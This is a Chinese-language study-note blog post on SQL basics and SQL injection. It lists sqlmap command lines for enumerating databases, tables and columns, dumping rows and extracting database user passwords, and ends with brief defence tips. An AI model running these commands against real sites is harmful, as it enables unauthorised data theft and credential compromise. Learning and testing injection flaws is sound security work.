当前位置: 开发笔记 > 后端 > 正文

学习笔记二十三-sql基础知识

作者：楼外蔷薇花开 | 来源：互联网 | 2023-09-17 11:25

1，什么是sql？是一种数据库的命令总集，同时呢是一种数据语言，数据库用来储存一些信息，数据库有很多中access，mysql，mssql等。2，什

1，什么是sql？

是一种数据库的命令总集，同时呢是一种数据语言，数据库用来储存一些信息，数据库有很多中access，mysql，mssql等。

2 ，什么是sql注入？

一些网站，当用户或者其他的人在网站上进行输入的时候，没有对其输入的字符进行合法的判断，在执行sql语句的时候，出现了保存，从而使攻击者获取她们想要的数据。

4，为什么会有sql注入？

程序员在编写源代码的时候，过滤的不严谨，进而导致攻击者利用过滤不严的漏洞进行注入，获取她们想要的信息。

5，如何利用sql注入？

我们可以通过手工注入，也可以通过工具进行注入

6，如何利用sqlmap进行注入？

首先注入的方式主要分为两种，因为form提交主要就是这两种，下面主要说一下，sqlmap的一些基本操作，范例就不截图了。下面主要是sqlmap中运行的语法，当然语法有很多，这里列举出来的都是一些比较长用的。

kali里面的话前面就要加python

sqlmap.py -u url --dbs //爆数据库

sqlmap.py -u url --current-db //爆当前库

sqlmap.py -u url --current-user //爆当前用户

sqlmap.py -u url --users 查看用户权限

sqlmap.py -u url --tables -D 数据库 //爆表段

sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段

sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解

sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段

sqlmap.py -u url 判断

sqlmap.py -u url --is-dba -v 这是判断当前数据库的使用者是否是dba

sqlmap.py -u url --users -v 0 这句的目的是列举数据库的用户

sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码

sqlmap.py -u url --privileges -v 0 这是判断当前的权限

sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来

sqlmap.py -u url --tables -D '表' 爆表

sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列

sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内

sqlmap.py -u url --dump -all -v 0

7，sql注入有什么样的危害？

攻击者可以该注入点，进行注入，对网站做出修改，获取管理员权限，从而获取系统管理员权限，同时呢，她们也可以在网站上挂马，搞跳转，挂超链接等，对网站和访问者造成不可估计的伤害。

8，如何防sql注入？

开启魔术引号，这样能更好的过滤掉那些非法字符；

安装安全狗，加速乐，搭建waf等；

来自为知笔记(Wiz)

推荐阅读

ci
深入理解 SQL 视图、存储过程与事务

本文详细介绍了SQL中的视图、存储过程和事务的概念及应用。视图为用户提供了一种灵活的数据查询方式，存储过程则封装了复杂的SQL逻辑，而事务确保了数据库操作的完整性和一致性。 ... [详细]

蜡笔小新 2024-12-27 17:40:42
mvc
PHP 编程疑难解析与知识点汇总

本文详细解答了 PHP 编程中的常见问题，并提供了丰富的代码示例和解决方案，帮助开发者更好地理解和应用 PHP 知识。 ... [详细]

蜡笔小新 2024-12-28 12:22:34
cron
新浪笔试题

1:有如下一段程序：packagea.b.c;publicclassTest{privatestaticinti0;publicintgetNext(){return ... [详细]

蜡笔小新 2024-12-27 19:32:17
mvc
PHP 5.2.5 安装与配置指南

本文详细介绍了 PHP 5.2.5 的安装和配置步骤，帮助开发者解决常见的环境配置问题，特别是上传图片时遇到的错误。通过本教程，您可以顺利搭建并优化 PHP 运行环境。 ... [详细]

蜡笔小新 2024-12-27 19:05:41
mvc
MyBatis 动态 SQL 详解与应用

本文深入探讨 MyBatis 中动态 SQL 的使用方法，包括 if/where、trim 自定义字符串截取规则、choose 分支选择、封装查询和修改条件的 where/set 标签、批量处理的 foreach 标签以及内置参数和 bind 的用法。 ... [详细]

蜡笔小新 2024-12-27 16:20:10
mvc
网站与MySQL数据库的连接与交互

本文详细介绍了如何通过多种编程语言（如PHP、JSP）实现网站与MySQL数据库的连接，包括创建数据库、表的基本操作，以及数据的读取和写入方法。 ... [详细]

蜡笔小新 2024-12-27 14:09:23
缓存
MySQL缓存机制深度解析

本文详细探讨了MySQL的缓存机制，包括主从复制、读写分离以及缓存同步策略等内容。通过理解这些概念和技术，读者可以更好地优化数据库性能。 ... [详细]

蜡笔小新 2024-12-26 15:15:06
port
MySQL 数据库迁移指南：从本地到远程及磁盘间迁移

本文详细介绍了如何在不同场景下进行 MySQL 数据库的迁移，包括从一个硬盘迁移到另一个硬盘、从一台计算机迁移到另一台计算机，以及解决迁移过程中可能遇到的问题。 ... [详细]

蜡笔小新 2024-12-26 13:21:38
java
Hadoop入门与核心组件详解

本文详细介绍了Hadoop的基础知识及其核心组件，包括HDFS、MapReduce和YARN。通过本文，读者可以全面了解Hadoop的生态系统及应用场景。 ... [详细]

蜡笔小新 2024-12-26 13:12:48
port
Python 爬虫基础教程及代码实例

根据最新发布的《互联网人才趋势报告》，尽管大量IT从业者已转向Python开发，但随着人工智能和大数据领域的迅猛发展，仍存在巨大的人才缺口。本文将详细介绍如何使用Python编写一个简单的爬虫程序，并提供完整的代码示例。 ... [详细]

蜡笔小新 2024-12-26 10:42:40
port
SQL中UPDATE SET FROM语句的使用方法及应用场景

本文详细介绍了SQL中UPDATE SET FROM语句的使用方法，通过具体示例展示了如何利用该语句高效地更新多表关联数据。适合数据库管理员和开发人员参考。 ... [详细]

蜡笔小新 2024-12-28 10:22:16
port
Windows 系统下 MySQL 8.0.11 的安装与配置

本文详细介绍了在 Windows 操作系统中安装和配置 MySQL 8.0.11 的步骤，包括环境准备、安装过程以及后续配置，帮助用户顺利完成数据库的部署。 ... [详细]

蜡笔小新 2024-12-27 13:16:32
port
MySQL数据库安装指南

本文详细介绍如何下载并安装MySQL数据库（5.7.10版本），以及配置Navicat管理工具（免费版）。通过本指南，您将了解从下载到安装的完整流程，并掌握基本的数据库管理技能。 ... [详细]

蜡笔小新 2024-12-27 10:53:40
port
MySQL中枚举类型的所有可能值获取方法

本文介绍了一种在MySQL数据库中查询枚举（ENUM）类型字段所有可能取值的方法，帮助开发者更好地理解和利用这一数据类型。 ... [详细]

蜡笔小新 2024-12-27 10:36:44
port
如何设计关系型数据库以有效记录设备的上下线历史

本文探讨了在处理大量物联网设备时，如何合理设计关系型数据库来高效记录设备的上下线历史，确保数据的可维护性和扩展性。 ... [详细]

蜡笔小新 2024-12-27 10:31:31

楼外蔷薇花开

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章